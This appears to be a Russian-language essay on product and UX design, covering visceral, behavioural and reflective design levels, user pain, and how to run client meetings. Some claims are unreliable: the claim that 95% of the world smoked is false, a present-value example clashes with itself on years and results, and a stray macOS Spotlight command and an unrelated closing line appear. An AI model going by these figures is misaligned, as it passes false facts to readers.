Первый это интуитивный — как продукт выглядит, второй поведенческий — как работает, и третий уровень рефлексивный — какую историю продукт мне рассказывает, или какую я могу рассказать. Интуитивный или висцеральный уровень — бессознательный. Вы смотрите на скрины и иконку в AppStore и чувствуете в доли секунды, есть ли отклик где-то в глубинах вашего сознания. Вы смотрите на лендинг сбербанка и у вас невольно возникает эмпатия или негатив. Или старые деревянные часы в деревне на камине у дедушки, они содержат куда меньше функций, чем самые дешевые современные часы с Aliexpress, простые каминные часы, но висцеральные качества (глубоко укоренившиеся, бессознательные, субъективные чувства) дают старым часам куда бОльшую ценность в глазах владельца-дедушки. Опираясь на этот уровень, мы можем использовать изображения детей, животных или персонажей мультфильмов, чтобы придать чему-то облик молодости, или используя цвета (например, красный — “сексуальный и агрессивный”, черный — “строгий премиум”), формы или стили (например, ар-деко), которые напоминают определенные эпохи.

Второй уровень, поведенческий — могу ли я с этим взаимодействовать, это как раз в чистом виде юзабилити. В случае студента, это ответ на вопрос,  есть ли время вечером на саморазвитие и участие в уроках, есть ли техническая возможность для этого. Поведенческий уровень самый простой для тестирования, можно точно подсчитать, насколько вы удовлетворены уроками, какие проблемы с интерфейсом платформы у вас возникают.

И третий уровень сложный, рефлексивный, это сознательное мышление. На этом уровне люди решают, что продукт может рассказать о них окружающему миру. Люди покупают часы Rolex  чтобы показать свой финансовый статус. А если покупают Apple Watch , значит, они фанаты Apple, люди в тренде и на пике технологий. И это самый сильный уровень, люди вполне могут мириться с трудностями и недостатками в удобстве использования часов, потому что верят, что получат от них ценные нефункциональные преимущества. Первая версия Apple Watch была сплошным набором функциональных проблем и странного юзабилити, но это не помешало компании получить второй по величине мировой доход в часовой индустрии в течение первого года с момента продажи! И это не самый впечатляющий пример. На мой взгляд самый впечатляющий пример это сам факт того, что 95% населения мира между 80-х и 2000 годами курило. Если кто-то из читателей пытался курить, то помнит свою первую сигарету, и это было явно не «Вау какие классные впечатления, это лучший опыт в моей жизни!». Особенно женщины. После второй мировой войны женщины получили больше равноправия, до второй мировой войны женщины редко курили. Соответственно, это пример, как табачные компании использовали рефлексивный уровень для продажи продукта. Куришь — значит, поддерживаешь равноправие. В общем, рефлексивный уровень про работу с желанием человека как-то себя преподнести. Очень легко отличить товар, который полагается на рефлексивный уровень. На старте продаж его всегда не хватает, все слышали про очереди за смартфонами Apple в магазины, или пред-заказы на дорогие Ferrari. А как только эти товары появляется в каждом магазине, то и цена падает, так как баланс спроса/предложения меняется. Много раз экспериментировали с книгами, просто указывая на сайте, то что книга out of stock. И после того, как книга появлялась в наличии, ее продавали по удвоенной цене и она прекрасно расходилась. В эмиратах запретили фильм «Борат», и были побиты все рекорды по закупкам этого фильма на пиратских DVD. Или джемы, если на полке 24 джема, то это слишком большой выбор и только 3% людей совершают покупку, так как изобилие. Игра на дефиците это почти всегда рефлексивный уровень. Если у вас нет конкурентных преимуществ и вы можете конкурировать только ценой, то дефицит — самый легкий способ отстроиться от конкурентов.

Если же они у вас есть, то нужно разрабатывать «нечестные» конкурентные преимущества, т.е. те, которые трудно или невозможно повторить конкурентам. Это могут быть патенты, они работает куда лучше, чем УТП.

Простой вывод — люди не покупают просто товары и услуги. Они покупают свое отношение к чему-либо, историю и магию. Особенно хорошо продается социальное одобрение чего-либо. 

Все три уровня, интуитивный, поведенческий и рефлексивный, их хочется как-то визуализировать для себя и держать где-то рядом. Есть много способов структурирования и визуализации такого рода знаний— делать CJM, создавать персоны, и так далее. Мы это еще рассмотрим в дальнейшем. Идея простая, мы ставим во главе три главные потребности, и от них строим отношение пользователя с продуктом.

Пример. Человек голоден и устал, проходит мимо палатки. Он в данном случае будет хотеть перекусить, и не откажется от шоколадного батончика (visceral). Простое удовлетворение потребности. Он купил батончик, съел его. И понял, что съел кучу сахара и ничего более, на поведенческом уровне чувствует себя не очень хорошо, так как поддался мимолетным желаниям, сделав плохо для здоровья. А учитывая, что ассоциировать себя со здоровым образом жизни модно, он еще буду надеяться, что никто из знакомых не видел, как он съел этот кусок сахара (рефлекторный уровень).

Итак, кто же такой дизайнер продукта: UX это профессия на стыке аналитика, инженера, психолога, менеджера, управленца, художника. Я бы сказал, что это детектив-консультант после многих сессий супервизии. Мне такое определение наиболее близко. Роль детектива нужна для расследований, исследований и аналитики. А консультант это про здравый смысл и работу с оттестированными паттернами работы пользователя. Консультант это про умение помочь менеджменту в достижении заявленных целей. Или хотя бы не дать ошибиться.

Еще кое что про UX. У людей есть один простой инстинкт — мы хотим отдыхать, получать удовольствие. Мы работаем и учимся чтобы отдыхать. Мы все делаем ради отдыха. Это основа UX — минимизировать когнитивную нагрузку на нашего пользователя. Именно это наша задача как специалистов.

Мозг покупателя всегда ищет способы отдохнуть. Представим, что вы выиграли в лотерею, и вам пообещали дать $500,000 через 3 года, но компания предлагает выкупить это обещание. То есть они вам заплатят здесь и сейчас. Сколько они должны заплатить? Текущая ценность = $500,000/(1+0.1)⁵ = $500,000/1.61 = $310, 559. Как думаете, победитель согласится получить 400 тысяч сейчас вместо 500 через 3 года? Если сейчас взять деньги и положить в банк. У нас есть $500.000, процентная ставка, 0.1 на 5 лет. Это означает, что сегодняшние $310 599 под 10% годовых и в течении 5 лет как раз превратятся в $500 000.

Решение проблем

Как идет решение задач: в начале всегда есть проблема у пользователей, мы эту пользовательскую боль находим, создаем решение, рисуем схемы в системах проектирования или даже на бумаге карандашом. В общем, как либо находим оптимальное решение проблемы и делаем прототип. Прототип это функциональная версия вашей идеи. Прототип нужен для тестирования. Иначе в нем попросту нет смысла. Попробовали прототип — поняли, то что ошиблись — и вернулись к этапу проектирования, и так итерациями. До тех пор, пока не найдем оптимальное решение. Или не поймем, что продукт рынку не нужен. 

Классическая картинка с проблемой,  и есть два способа решения проблемы: либо асфальтировать тропинку, либо установить заборы.

Это самая классическая картинка про боль пользователей, они ходят по тропинке вместо дороги, и коляску с ребенком неудобно везти, про гололед зимой промолчу. И уж тем более промолчу про пылеватый песок. Подтвердили, что боль требует решения и за такое решение готовы платить. И возникает слово «Вау/WoW» — это манипулятивное слово из маркетинга, вау-продукт, вау-лендинг, вау-приз, вау-зарплата. WOW это небольшое удивление, легкое и приятное, мы видим нечто новое в продукте, чего не ожидали увидеть. и говорим: о прикольно. Вышел смартфон без кнопок — ВАУ, вышел экран без рамок — ВАУ. Поэтому эффект от «вау» краткосрочный. Живые успешные продукты развиваются и выдают эти маленькие «ВАУ», это поддержка желания обладать продуктом. Яндекс-карты научились показывать подъезды в домах на карте — вау! хотя 2Gis это умел еще два года назад. Ключевая идея: продукты развиваются и постоянно дополнятся нужным и полезным функционалом. И именно это позволяет строить долгосрочные отношения клиента с продуктом, чем продуктовые дизайнеры и занимаются.

Другой пример: Tinder, его основная черта это удобная механика. Он удобный быстрый и простой. Это очевидно, но есть и более глубокие моменты — сценарий использования перебор карточек, мы все умеем раздавать игральные карты, этот сценарий интуитивно понятен всем. Система не говорит своему пользователю, что он никому не нравится и все девочки его свайпят вправо, она сообщает только о позитивных откликах. Это позитивный опыт и постоянные маленькие WoW.

Опыт может быть и негативным. Разрыв ожиданий с реальностью это всегда негативный опыт. В том числе и в интерфейсах. Если вы нажали на кнопку «войти в вебинар», а вместо вебинара вам показали ошибку, то это негативный опыт. Пример элементарный, но он позволяет начать думать в контексте эмоций пользователя. Это важно, именно эмоции являются драйвером продаж, потому что без эмоций любой бизнес это просто демпинг ценой. Конкурировать ценой смогут далеко не все ваши клиенты (компании). Поэтому работа дизайнера в поиске дополнительной ценности, которая будут помогать продавать. Пример   Starbucks, которые продают не самый лучший кофе за большие деньги, но у них постоянно очередь из клиентов. Значит, Starbucks продает на кофе, Starbucks зарабатывает на кофе. А продают они образ и стиль жизни. Дизайн призван помогать продавать, создавать добавленную стоимость, но в то же время он очень анти-капиталистический и профессия дизайнера про то, как помогать людям. IKEA, Zara, такого рода компании делают ставку на дизайн, но в тоже время они стремятся сделать вещи доступными для людей. А не создать уникальный стульчик/кофточку за миллиард, это fahsion, а не дизайн.

Итак, теперь нейронные связи должны были сложились на тему пользовательского опыта, все примеры как раз к этому и подводили. И опыт мы рассматривает не в контексте человека, а в контексте пользовательского сценария. Так называемого юзер flow.

Коммуникация с клиентом

На кого мы работаем? На кого-нибудь. В современном мире все люди работают на кого-то. Кем бы человек ни был, бизнесменом, фрилансером, наемным сотрудником в офисе, президентом страны, все эти роли работают на определенного клиента. Фраза “я работаю сам на себя” некорректна. Даже если вы фрилансер , вы работаете на своих клиентов, бизнесмены работают на своих покупателей и на своих сотрудников. Так работает экономика. Поэтому нельзя игнорировать желания клиента и клиентов клиента. Чего хочет клиент от дизайнера? Обычно в обмен на некую сумму денег получить большую сумму денег. А как именно — вопрос к нам.

И тут можно было бы завершить рассказ, и сесть рисовать макеты, но есть очень не тривиальная тема как общаться с клиентом и какие трудности при этом возникают. Еще Эйнштейн говорил: «если мне дадут месяц на решение задачи, я буду 28 дней себе ее ставить». По сути, мы должны структурировать шквал разрозненной информации и понять, что реально нужно клиенту. Бывает и такое, что на этапе общения с клиентом выясняется, то что рисовать ничего и не надо. Может весь продукт будет простое SMS с кодом.

Не всегда все решается визуальным дизайном. Например, отток клиентов из магазина может быть вызван не ужасным визуальным стилем магазина, а плохой работой продавцов, может они одеты странно или у них фиговый скрипт общения с клиентами. Я с таким часто сталкивался в тематических магазинах, вроде спортивных или магазинов для выживальщиков. 

Как легко заставить любого дизайнера накосячить? Дать задание сделать логотип за 1 день без правок. Бриф минимальный: сильный, динамичный, уверенный, современный, запоминающийся знак. В результате будет работа, которая не соответствует ожиданиям клиента, независимо от навыков дизайнера. В креативных агентствах такие абстрактные брифы используют, раскидывая задание на пару десятков креативщиков, они придумывают идеи, и те идеи, что идут в презентацию клиенту — оплачиваются. Но это про мир рекламы. Работая над продуктом, такой подход будет просто убивать бизнес клиента, т.е. нам нельзя ошибаться.

Поэтому вбиваем себе в голову три основных вопроса: зачем? для кого? как? Первый вопрос — тут все понятно, а зачем нужен редизайн сайта? Может, сайт визуально устарел, или продуктовая линейка разрослась и нужно обновить логику сайта. 

Зачем? Для вашего клиента ответ на этот вопрос очевиден. Он хочет заработать денег и не дать бизнесу умереть на долгой дистанции. Тогда надо понимать, что смысл существования компании Nike не заработать денег, а сделать спорт доступным для всех. Это их ценность, которая увеличивает качество жизни их клиентов, и это та самая добавленная стоимость от дизайна. А через достижение этой цели будет приток денег. Прибыль это не цель, прибыль это метрика.

Или банки, у каждого банка есть своя специализация, СовКом это пенсионеры, Банк Хоум Кредит про потребительские кредиты, Альфа для мужчин-бизнесменов, Райф это премиум. Суть в том, что компании важно стать №1 в чем-то, где-то и для кого-то, найти для себя незанятую нишу, найти свой голубой океан. Это та аудитория, которая кормит бизнес. Любые другие подходы работают слишком краткосрочно. При этом, продукты банков могут не отличаться друг от друга по функциональному наполнению. Конкуренция только за счет сервиса и условий. Если же компании конкурируют друг с другом в рамках багрового океана, то и подход к исследованиям будет другой: много доступных данных, значит не нужно много интервью.

Другой пример: у сервисов для прослушивания музыки главная метрика это сколько люди слушают музыку. Компания хочет улучшить этот показатель, так как если будут прослушивания, то будет и прибыль. Давайте на примере Spotify: ключевой метрикой считается количество времени, которое люди слушают музыку. Из нее выходят другие метрики, как часто пользователи возвращаются и это автоматическое увеличение кол-ва времени прослушивания музыки. Полученные метрики дробятся на метрики более низкого уровня: количество уведомлений про новых исполнителей, рекомендации, сколько плейлистов было создано, как много пользователи нашли новых песен, и вокруг этой истории накручиваем финансовые метрики. И над всем этим обилием метрик висят и главенствуют финансовые метрики, например денежный поток, ликвидность, уровень долга, рентабельность по сегментам бизнеса.

Второй вопрос для кого? — мы должны очень тонко чувствовать аудиторию, на которую мы работаем. Какие привычки у аудитории, кто у бизнесмена ЦА.

И третий вопрос Как? это про способ, как мы закроем потребность.

В результате общения с клиентом мы должны получить бенчмаркинг, то есть понимание целей проекта:

Как выявить ЦА: клиент почти всегда ответит, что его ЦА это все платежеспособные люди. Как не трудно догадаться, все люди это вечный ответ на вопрос про то, кому клиент хочет продавать свои товары и услуги. И о понятии «ядро ЦА» клиент даже не слышал. В таком случае надо уточнять. Например, у клиента магазин автозапчастей, и мы можем попросить рассказать, какие сводные данные по покупателям, которые что-либо покупали на этой неделе в разделе покрышки. И сразу выяснится, что это мужчины 28-36, преимущественно на BMW, которые указывают предпочтительный способ связи как телефон.

Главное в работе с клиентом это личный контакт. Можно использовать Skype, если вы работаете в разных городах. Но всегда лучше встретиться в жизни. И все проговорить голосом. Когда вы видите человека в живую, вы можете задать больше вопросов, посмотреть на реакцию человека на ваши предложения, порисовать вместе с ним карандашом на салфетке, сможете получше узнать какой у него бизнес, какие проблемы есть у бизнеса. Также, полезно почитать отзывы о бизнесе клиента, заранее. Ну и при личной встрече можно настроить эмпатию. Удаленно это сложнее сделать.

И еще кое что про личную встречу. Чуть перемотаем вперед и представим, что мы на финальном этапе работы, когда дизайн уже нарисован. Продуктовые дизайнеры обычно презентуют свой дизайн лично, в оффлайне, а не просто скидывают макет по почте. Клиент не сразу будет принимать ваши идеи, концепции, это нормально, он не эксперт и будет предлагать странные (на ваш взгляд) идеи по дизайну, но вы должны защищать свои идеи. Только нельзя забывать, что клиент свой бизнес и своих пользователей обычно знает лучше вас, поэтому к его доводам важно прислушиваться. 

Итак, вернемся к первой встрече. Существует чек-лист первой встречи с клиентом: начало работы между двумя людьми это партнерские отношения и к этому надо относиться серьезно. Поэтому мы должны выглядеть приятно, без запаха изо рта, без блохастого свитера, с улыбкой на лице. Заранее узнаете как можно больше про бизнес клиента, так как если вы пришли на встречу и не знаете даже, что клиент занимается нефтью или ракеты строит, или у него просто булочная, то это будет очень неприятно клиенту, и будет сложно вести разговор. Встретиться можно в кафе, офисе, коворкинге, вариантов много. Для разогревать поговорить на отвлеченные темы, клиент это тоже человек и он тоже хочет узнать о вас побольше. Возможно, ему понадобятся ваши компетенции не только как дизайнера. Зарядите ноутбук по максимуму, возьмите блокнот и ручку, заранее откройте все нужные вкладки на ноуте или планшете. С вашим портфолио, с гуглодоками для конспектов, с сайтом клиента. Если у вас мало места на жестком диске на MacOS, отключите спотлайт командами sudo mdutil -E -a и sudo mdutil -a -i off.

Далее, вы встретились с клиентом. Дайте ему в руки теплый напиток, люди более откровенно говорят, когда у них в руках теплый напиток. Поэтому HR и предлагают кофе на собеседованиях. Основной подход на первой встрече это общение как психолог, доктор. Принцип такой: сначала получаем всю информацию, потом выдаем свой вердикт. Сначала слушаем проблему, а потом формулируем свою экспертную оценку. Сразу решение не предлагаем ,  это людей расстраивает. 

Пусть клиент расскажет о себе, о бизнесе, про истоки бизнеса, какие проблемы решает бизнес, какие дальнейшие шаги роста бизнеса, какой результат от сотрудничества с вами он хочет получить? Может, клиент хочет увеличить определенную метрику, допустим, уменьшить число возвратов товара. И вы все свои усилия будете направлять именно на это. Вполне живая история, клиент экспертно решил, что для уменьшения кол-ва возвратов товара нужно сделать форму возврата товара более сложной и неудобной. В этом случае правильное поведение — исследовать вопрос, узнать, что возвраты товара происходят из-за недостоверной информации на сайте. И вашей задачей будет предложить клиенту не портить форму возврата товара, а улучшить способ подачи контента на сайте и подход к созданию контента. Может, достаточно уволить криворукого контент-менеджера.

Есть классическая история из ресторана в Манхэттене. У ресторана появилось много жалоб на медленное обслуживание, и руководство ресторана решило сравнить записи с камер наблюдения, сделанные с разницей в десять лет. Они подняли записи, посмотрели и поняли, что среднее время приема пищи в 2004 году длилось 65 минут. В 2014 году, всего десять лет спустя, оно увеличилось до 115 минут. Кто виноват? Ресторан заметил, что именно навязчивое использование клиентами мобильных телефонов удлиняет время приема пищи. Теперь клиент хочет и сфоткать свою еду для инстаграмма, и везде всем ответить, а потом обязательно пожаловаться что еда уже остыла. Виноваты не сотрудники, проблема лежит в новом поведении аудитории.

Или проблемы с записью к врачу. Клиенты не знают, у какого доктора были или кто ведет их заказ. Как это решить? Обычно клиенты работают с конкретным менеджером, врачом или автослесарем, и можно разместить фото менеджеров/слесарей на сайте. Клиенту будет проще найти нужного специалиста по фотографии. Достаточно разместить фотографии на сайте клиники/автосервиса. Для выявления таких инсайтов нужно обсуждать не конкретные молекулы/организмы на экране, а скорее в формате, что на конкретном экране пользователь должен сделать.

По ходу общения с клиентом надо будет думать о вариантах решения задачи, какие фичи нужны бизнесу. Существует два способа как появляются фичи: либо у нас уже есть статистика и аналитика, тогда мы исходя из этих данных решаем, что клиентам нужна определенная фича. Или наоборот, мы сначала придумываем что нам нужна фича (или за нас это делает HiPPO), а потом делаем аналитику.

Также можно считать прогноз, что будет с бизнесом, если ничего не делать с проблемами. Коммуницировать с клиентом, базируясь на цифрах, это очень комфортная история для дизайнера. Сначала спрашиваем, сколько клиент зарабатывает на платящем пользователе, допустим это 8 000 ₽ в месяц, и бизнесу остается 30%, так как остальное уходит курьерским компаниям, на логистику, хранение, посредники и так далее. 8 000 * 0,3 = 2400 мы зарабатываем с платящего. Допустим, люди покупают с конверсией 1% (на 100 000 посетителей только 1 000 совершили покупку). Значит, с 2400 убираем два нуля, и получаем 24 ₽. Команда разработки стоит, например, 1,500 000 в месяц, 1 500 000 / 24 ₽ = 62 500 пользователей в месяц надо нагнать к нам в сервис. Сразу понятно, что надо делать и какие будут метрики.

Либо у клиента полностью отсутствуют количественные данные, и тогда мы его расспрашиваем. Клиент хочет от вас интерфейс личного кабинета застройщика недвижимости? Вы должны узнать, зачем нужен ЛК? Как пользователи себя ведут до покупки квартиры, после покупки, какие дополнительные услуги им нужны, или какие дополнительные услуги клиент хотел бы продавать (отделка, обслуживание сантехники в течении 5 лет, консьерж, видеонаблюдение), кто покупает, только частные лица или перекупка с целью дальнейшей продажи. С каким банком работает застройщик, может есть эксклюзив на работу с определенным банком по ипотеке. В общем, вы задаете много вопросов, о которых даже сам клиент мог не задумываться. И общие вопросы: чем вы лучше других? Какие барьеры стоят перед бизнесом? Что мешает рости бизнесу?

Но даже если проблема есть и она очевидна, не факт, что мы можем ее исправить. Рассмотрим пример Disneyland, он всем известен как живая сказка и постоянное веселье. Но менеджмент заметил, что у них падает одна из ключевых метрик. И это не деньги. Посетители перестали возвращаться, они посещают Disneyland один раз и все. А все из-за очередей. Проблема есть, надо решать. Собрались самые умные люди из менеджмента, поштурмовали мозгами проблему, и ушли с классными идеями как сделать парк более быстрым, персонализированным, избавиться от очередей, модернизировать его. И не сработало. Почему не сработало? Организационная разобщенность. Поменять или применить технологии самое легкое, что можно сделать, это просто вопрос инвестиций. А изменить культуру внутри компании куда сложнее и дольше. 

Корень проблемы лежит в людях. У людей есть две системы принятия решений, первая выдает быструю реакцию на внешние раздражители, и вторая требует усилий и её надо включить осознанно. В стрессовых ситуациях решения принимаем сигнальная система, гоняет человека по кругу принятия шаблонных решений, которые и привели к стрессовой ситуации. Важно держать в уме, если клиент говорит, что уже работал с 3-я дизайнерами и они все его подвели, то это такой звоночек, что клиент просто не видит реальную проблему в своей организации.

Как вы уже догадались, продуктовый дизайнер это не двигатель пикселей и не художник цветных квадратиков, дизайнер много консультирует. Мне на данный момент ближе всего определение дизайнера как детектива-консультанта. Потому что дизайнер должен хорошо знать клиента, исследовать его. Узнаете все про конкурентов, какой жизненный цикл у продукта. Будет ли клиент поддерживать сайт сам, или вы будете это делать? Большинство клиентов о таком не задумываются, что будет с результатами вашей работы спустя год. Допустим, если клиент хочет блог как у Тинькова, и тогда ваш первый вопрос — будут ли люди, которые будут его регулярно наполнять контентом, отслеживать комментарии? Или продавец дешевой недвижимости хочет аналогичный сайт, как у элитной недвижимости. Но поведение аудитории ценового сегмента эконом/прагматик и ожидания аудитории категории «бизнес» сильно отличаются, не говоря уже о процессе покупки.

Vision Express Sales